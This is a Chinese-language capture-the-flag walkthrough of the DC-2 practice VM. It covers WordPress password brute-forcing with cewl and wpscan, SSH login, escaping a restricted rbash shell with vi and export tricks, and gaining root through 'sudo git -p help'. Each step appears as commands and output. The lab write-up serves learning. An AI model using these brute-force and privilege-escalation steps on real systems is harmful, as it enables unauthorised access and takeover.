DC-2
kali:192.168.32.135
靶机:192.168.32.142
扫描到IP为192.168.32.142,端口只有80和7744开放了。但是访问80却访问不到,显示了一个域名dc-2,盲猜跟hosts文件有关,但是没在Linux下修改过hosts文件,查了查,方法如下:
root@kali:~# vi /etc/hosts
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.32.142 dc-2再访问就看到了,是一个典型的wordpress站,版本是4.7.10,页面下滑就看到了flag1:你平时的密码字典可能不起作用,所以你或许需要cewl(kali自带的密码生成工具)密码越多越好,但有时你不可能全都赢。以个人身份登录以查看下一个标志。如果找不到,请以另一个身份登录。这不就是让我爆破跑字典嘛,还说的挺洋气。
那就听提示的cwel生成一份密码试试:
root@kali:~# cewl http://dc-2 -w password.txt -d 3
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)现在我得知道他都有什么账号存在啊,这个时候就要祭出kali的wpscan了,专业wp扫描,巴适滴很!
root@kali:~# wpscan --ignore-main-redirect --url 192.168.32.142 -e u --passwords password.txt --force
......
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient用刚生成的密码字典,直接在wpscan中进行爆破,除了admin没爆破出来,剩下俩都有了。登录wp的后台看一圈在jerry的账号下看到了flag2:如果你不能利用WordPress并走捷径,还有另一种方法,希望你能找到另一个入口。这就有点忒隐晦了,nmap又扫了半天还是只开了80和7744端口,知道某一瞬间我看到7744是ssh的端口我才顿悟。
转换思路登录ssh:
root@kali:~# ssh tom@192.168.32.142 -p 7744
tom@192.168.32.142's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$最终tom的账号登上去了,继续摸索,ls出来了flag3.txt但是cat命令显示无权限,这就很鬼了,又是一波强有力的搜索,才发现这个提示的情况可以绕过:-rbash: cat: command not found
绕过rbash提权(非root)
如果bash以rbash名称启动,或者启动时使用了-r选项,那么它成为受限的shell即Restricted Shell。受限的shell一般用来建立一个比标准的shell受到更多控制的环境,与一般标准shell的区别在于会限制执行一些行为。
资料显示该提权方式一般需要拥有vi和export的权限,通过组合拳解决问题得到高权限。
vi提权
vi shell.txt
:set shell=/bin/bash
:shellexport提权
export是一个控制环境变量的命令,用其也可实现提权
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/ 或者export PATH=/usr/sbin:/usr/bin:/sbin:/bin此类提权只能小幅度获得命令使用权限,无法真正的提升至root权限,单根据flag3:Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.的提示,是让我登录jerry的账号,迷惑,不知道刚才为啥没登上,这会儿再登就能登上了...果然我还是年轻了,不是ssh退出重连,而是su命令切换到jerry账号...
切过去后又有了一点点小问题,但是凭借我聪慧过人的智慧,很轻松老费劲了
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd ../
jerry@DC-2:/home$ ls
jerry tom
jerry@DC-2:/home$ cd jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!一边说着没提示了自己干吧,一边暗示我git,真·良心!但我依旧不会
以下内容来自网络,侵也不删!
jerry@DC-2:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ sudo git -p help
......
!/bin/bash
root@DC-2:/home/jerry# ls
flag4.txt
root@DC-2:/home/jerry# cd ../
root@DC-2:/home# ls
jerry tom
root@DC-2:/home# cd ../
root@DC-2:/# ls
bin etc lib mnt root srv usr
boot home lost+found opt run sys var
dev initrd.img media proc sbin tmp vmlinuz
root@DC-2:/# find / -name 'thefinalflag.txt'
root@DC-2:/# cd root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.以上涉及到以下知识点:敲黑板划重点了!
1、find查看SUID权限文件
2、在看到有sudo时,利用sudo -l查看当前用户具有的权限
3、sudo+git提权
